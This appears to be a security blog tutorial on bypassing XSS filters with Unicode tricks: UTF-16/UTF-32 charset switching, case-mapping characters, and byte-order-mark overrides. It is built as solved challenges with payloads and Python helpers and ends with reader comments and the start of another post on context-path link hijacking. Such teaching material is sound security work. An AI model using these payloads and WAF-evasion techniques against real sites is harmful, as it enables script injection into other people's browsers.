
Xssing Web Part - 2

Xssing Web With Unicodes

Hello friends, 

This is the second part of "Xssing Web". In this post I will show how to abuse Unicode encodings to bypass XSS filters.

BTW, if you want to check out the previous part, click here.

Note : If you spot any mistakes in this post, kindly mention them in the comments.

I have developed several XSS challenges to show how Unicode can be used to bypass filters. If you want to try those challenges first, click here, and come back if you can't solve any of them.

Abusing Unicode :

So what is Unicode?

-> Unicode is a character encoding standard. It defines the UTF-8, UTF-16 and UTF-32 encodings.

1) UTF-8 :

Character Size : 1 to 4 bytes

Example :

Character "A" => 0x41
Character "¡"  => 0xC2 0xA1
Character "ಓ" => 0xE0 0xB2 0x93
Character "𪨶" => 0xF0 0xAA 0xA8 0xB6
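
If you want to verify these bytes yourself, here is a small Python sketch (Python is my choice here, and `utf8_hex` is just a helper name I made up for illustration) that prints the UTF-8 bytes of the same four characters:

```python
# Print the UTF-8 bytes of the sample characters from the list above.
samples = ["A", "\u00a1", "\u0c93", "\U0002aa36"]

def utf8_hex(ch: str) -> str:
    """Return the UTF-8 bytes of ch as space-separated 0xNN values."""
    return " ".join(f"0x{b:02X}" for b in ch.encode("utf-8"))

for ch in samples:
    print(f"U+{ord(ch):04X} {ch} => {utf8_hex(ch)}")
```

The number of bytes grows with the code point, which is why UTF-8 is called a variable-width encoding.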

2) UTF-16 :

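Character Size : 2 bytes (4 bytes for characters outside the Basic Multilingual Plane, which are stored as surrogate pairs)

However, in UTF-16 there are two byte orders in which a character can be represented.

i) UTF-16be (be - Big Endian) [Left to Right Byte Order]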

Example :

Character "A" => 0x00 0x41

ii) UTF-16le (le- Little Endian) [Right to Left Byte Order]

Example :

Character "A" => 0x41 0x00

3) UTF-32 :

Character Size : 4 bytes

In UTF-32 there are also two ways to represent any character.

i) UTF-32be (be- Big Endian) [Left to Right Byte Order]

Example :

Character "A" => 0x00 0x00 0x00 0x41

ii) UTF-32le (le- Little Endian) [Right to Left Byte Order]

Example :

Character "A" => 0x41 0x00 0x00 0x00
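
The byte orders above can be checked with a short Python sketch. The codec names are Python's standard ones, and `hex_bytes` is only a helper I named for this example. It also encodes one character from outside the Basic Multilingual Plane to show that UTF-16 needs 4 bytes for it:

```python
def hex_bytes(data: bytes) -> str:
    """Format bytes as space-separated 0xNN values."""
    return " ".join(f"0x{b:02X}" for b in data)

# "A" in both byte orders of UTF-16 and UTF-32.
for codec in ("utf-16-be", "utf-16-le", "utf-32-be", "utf-32-le"):
    print(f"{codec:10} A => {hex_bytes('A'.encode(codec))}")

# U+2AA36 lies outside the BMP, so UTF-16 stores it as a surrogate pair.
print("utf-16-be U+2AA36 =>", hex_bytes("\U0002aa36".encode("utf-16-be")))
```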

Alright. Enough unicode theory.

Let's see some XSS filters that you can bypass using unicode.

Challenge 1 :

How would you bypass it?


Hint : You can control the charset of html response.

No luck?
It's simple, you just have to use UTF-16 encoding to bypass the filter. 

Solution :

Here we changed the charset to "utf-16be", so the browser treats the page as a UTF-16 big endian encoded page. In UTF-16 each of these characters takes 2 bytes, so <svg/onload=alert()> becomes \x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>

Alright, now let's assume the string "UTF-16" is filtered.
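
The encoded payload can be produced with a few lines of Python. This is only a sketch: the challenge filter itself is not reproduced here, so the `b"<svg"` check below stands in for a hypothetical byte-level filter that looks for the ASCII tag.

```python
from urllib.parse import quote_from_bytes, unquote_to_bytes

payload = "<svg/onload=alert()>"

# Every character of the payload becomes a 0x00 byte followed by its ASCII byte.
encoded = payload.encode("utf-16-be")
print(encoded)

# Percent-encoded form, suitable for putting into a query string.
url_form = quote_from_bytes(encoded)
print(url_form)

# A hypothetical filter that searches for the ASCII bytes "<svg" finds nothing,
# yet a UTF-16BE decoder recovers the original markup.
print(b"<svg" in encoded)
print(encoded.decode("utf-16-be"))
```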

Challenge 2 :

Now how would you bypass it?

Hint : You can control the charset of html response.

No luck?
It's also very simple, you can simply use UTF-32 encoding to bypass the filter.

Solution :

Note : When you don't specify BE (Big Endian) or LE (Little Endian), browsers default to Big Endian for UTF-32 and Little Endian for UTF-16.

BTW, did you notice that I added two extra null bytes at the beginning of our payload?


Let me explain why. Each character in UTF-32 is 4 bytes, so while reading the page the browser treats every 4 bytes as one character. If there are, say, just 2 bytes before our payload, we must add 2 extra bytes to complete that 4-byte character. Otherwise the browser would consume bytes from our payload while reading the previous character.
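
Here is a rough Python sketch of that alignment trick. The 2-byte prefix `b"ab"` and the helper name `pad_for_utf32` are assumptions for illustration; in the real challenge the prefix is whatever the page outputs before the injection point.

```python
def pad_for_utf32(prefix_len: int) -> bytes:
    """Null bytes needed to bring prefix_len up to a multiple of 4."""
    return b"\x00" * (-prefix_len % 4)

prefix = b"ab"  # hypothetical 2 bytes that precede the injection point
payload = "<svg/onload=alert()>"
encoded = payload.encode("utf-32-be")

# With padding, the payload starts on a 4-byte boundary and survives decoding.
aligned = prefix + pad_for_utf32(len(prefix)) + encoded
print(aligned.decode("utf-32-be", errors="replace"))

# Without padding, every 4-byte unit straddles two characters and the payload is lost.
misaligned = prefix + encoded
print(payload in misaligned.decode("utf-32-be", errors="replace"))
```

The prefix bytes themselves decode to garbage (shown as a replacement character), which is fine as long as the payload that follows stays intact.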

Abusing Unicode Case Mappings :

Now let's move towards unicode case mappings.

Let's see if there are any Unicode characters which, when mapped to upper or lower case, transform into English alphabet letters.

I wrote a small piece of JS code to obtain these characters. [You can get the code here]

We can use these Unicode characters to bypass some XSS filters.
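
The original JS code is behind the link, so the following is not that code but a comparable sketch in Python. It assumes that Python's `str.upper()` and `str.lower()` behave like the target's case mapping for these characters, which may not hold for every platform. The function name `ascii_case_collisions` is made up for this example.

```python
import string

ASCII_LETTERS = set(string.ascii_letters)

def ascii_case_collisions():
    """Find non-ASCII characters whose upper/lower mapping is one ASCII letter."""
    hits = []
    for cp in range(0x80, 0x110000):
        ch = chr(cp)
        for name, mapped in (("upper", ch.upper()), ("lower", ch.lower())):
            if len(mapped) == 1 and mapped in ASCII_LETTERS:
                hits.append((f"U+{cp:04X}", name, mapped))
    return hits

hits = ascii_case_collisions()
for code_point, mapping, letter in hits:
    print(code_point, mapping, "=>", letter)
```

Only single-letter results are kept here, so characters that expand to several letters when upper-cased are skipped.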

Challenge 3 :

Could you solve it?
Hint : Check above image

Let's try to solve it. As you can see in the above image, we have a Unicode character ſ [\u017f] which, when mapped to Upper Case, turns into the capital letter "S".

Our payload : <ſcript/src=./1></script>

Solution : <%C5%BFcript/src=./1></script>
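
To see why this works, here is a toy model in Python. The challenge source is not shown in this post, so both functions are hypothetical: `naive_filter` stands for a filter that blocks "<script" in any ASCII case, and `render` stands for an application that upper-cases the input before echoing it.

```python
from urllib.parse import quote

def naive_filter(value: str) -> bool:
    """Hypothetical filter: allow the input only if it has no '<script'."""
    return "<script" not in value.lower()

def render(value: str) -> str:
    """Hypothetical sink: the application upper-cases input before output."""
    return value.upper()

payload = "<\u017fcript/src=./1></script>"

print(naive_filter(payload))            # the filter does not see "<script"
print(render(payload))                  # but the upper-cased output has <SCRIPT
print(quote(payload, safe="<>/=."))     # percent-encoded form for the URL
```

The filter runs before the case mapping, so it never sees the letter "S" that the mapping creates afterwards.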

Now let's make it little harder.

Challenge 4 :

Could you XSS now?

No? Ah. It's also very simple.

Let's check above image again. You see there's a unicode character ı [\u0131] which when mapped to Upper Case turns into capital letter "I".

Our payload : <scrıpt/src=./1></script>


Now let's try another challenge.

Challenge 5 :

Try to solve it.

No luck? Go back to the above image again. See, the Unicode character K [\u212a], when mapped to Lower Case, transforms into the letter "k".

Our payload : x onclicK=aler$t()

Solution : onclic%e2%84%aa=aler$t()

Note : Since I couldn't disable the WAF, I had to put '$' in "aler$t()" to bypass it.

Tool to convert unicode code points to UTF-8 bytes :
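
If the tool is not at hand, the same conversion is a couple of lines in Python. This is just a sketch with a helper name of my own (`codepoint_to_percent`), not the linked tool:

```python
def codepoint_to_percent(cp: int) -> str:
    """Return the percent-encoded UTF-8 bytes of a Unicode code point."""
    return "".join(f"%{b:02X}" for b in chr(cp).encode("utf-8"))

# The three characters used in the challenges above.
for cp in (0x017F, 0x0131, 0x212A):
    print(f"U+{cp:04X} => {codepoint_to_percent(cp)}")
```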

Abusing BOM - Byte Order Mark :

What is BOM ?

For the 16- and 32-bit representations, a computer receiving text from arbitrary sources needs to know which byte order the integers are encoded in. Because the BOM itself is encoded in the same scheme as the rest of the document, but has a known value, the consumer of the text can examine these first few bytes to determine the encoding.

- Wikipedia

Note : The page must begin with the BOM character.

- BOM Character :

For UTF-16 Encoding:

Big Endian : 0xFE 0xFF 

Little Endian : 0xFF 0xFE

For UTF-32 Encoding:

Big Endian : 0x00 0x00 0xFE 0xFF 

Little Endian : 0xFF 0xFE 0x00 0x00
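
The same BOM values are available as constants in Python's `codecs` module. The sketch below shows how a consumer could sniff the encoding from the first bytes. `sniff_bom` is a name I made up, and real browsers may support only some of these BOMs.

```python
import codecs

# UTF-32 must be checked first: the UTF-32LE BOM starts with the UTF-16LE BOM.
BOMS = [
    (codecs.BOM_UTF32_BE, "utf-32-be"),
    (codecs.BOM_UTF32_LE, "utf-32-le"),
    (codecs.BOM_UTF16_BE, "utf-16-be"),
    (codecs.BOM_UTF16_LE, "utf-16-le"),
]

def sniff_bom(data: bytes):
    """Return the encoding named by a leading BOM, or None if there is none."""
    for bom, name in BOMS:
        if data.startswith(bom):
            return name
    return None

print(sniff_bom(b"\xfe\xff\x00<"))
print(sniff_bom(b"\xff\xfe\x00\x00<\x00\x00\x00"))
print(sniff_bom(b"<html>"))
```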

Alright. Here's a small challenge. This challenge was actually posted by @rawsec

Challenge 6 :

This is going to be hard one. 
Couldn't solve it?

Hint : BOM

Still no luck?

Let me tell you one interesting thing about the BOM character: it allows you to override the charset of the page. The only requirement is that the page begins with this character.

So to override the page encoding with UTF-16be you can use the BOM character 0xFE 0xFF, and for UTF-32be you can use 0x00 0x00 0xFE 0xFF.

UTF-16BE Solution

UTF-32BE Solution
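
The exact challenge URLs are not reproduced here, so the following is only a sketch of how such BOM-prefixed payloads could be built in Python. It assumes the injection lands at the very start of the response and reuses the `<svg/onload=alert()>` payload from Challenge 1.

```python
import codecs
from urllib.parse import quote_from_bytes

payload = "<svg/onload=alert()>"

# BOM first, then the payload in the encoding that the BOM announces.
utf16_body = codecs.BOM_UTF16_BE + payload.encode("utf-16-be")
utf32_body = codecs.BOM_UTF32_BE + payload.encode("utf-32-be")

print(quote_from_bytes(utf16_body))
print(quote_from_bytes(utf32_body))

# Python's BOM-aware "utf-16" and "utf-32" decoders pick the byte order from
# the BOM, much like a consumer that trusts the BOM over the declared charset.
print(utf16_body.decode("utf-16"))
print(utf32_body.decode("utf-32"))
```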

That's enough for today :)

  1. But how common is it to be able to change the charset with a query param?

  2. \x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>

    from where u got this? I could not find anywhere equivalent to this


This post is about how to manipulate resource links of HTML elements (script, img, link, etc) when getContextPath  method is used to obtain base path of resources. With the ability to manipulate links you can do XSS, CSS Injection, etc. Basically we are going to use path parameters to manipulate context path such that links would point to attacker's domain. There's a good blog that talk about the similar issues : However this post is more about manipulating context path to hijack resource links of HTML elements .  So let's have a look at a simple JSP page ( test.jsp ) Ref : This page just loads some resources like script, image, css and that's it. It doesn't take any direct input from user but it is using value returned by r equest.getContextPath() as base path to resources link. What can we do here? Let's try to contro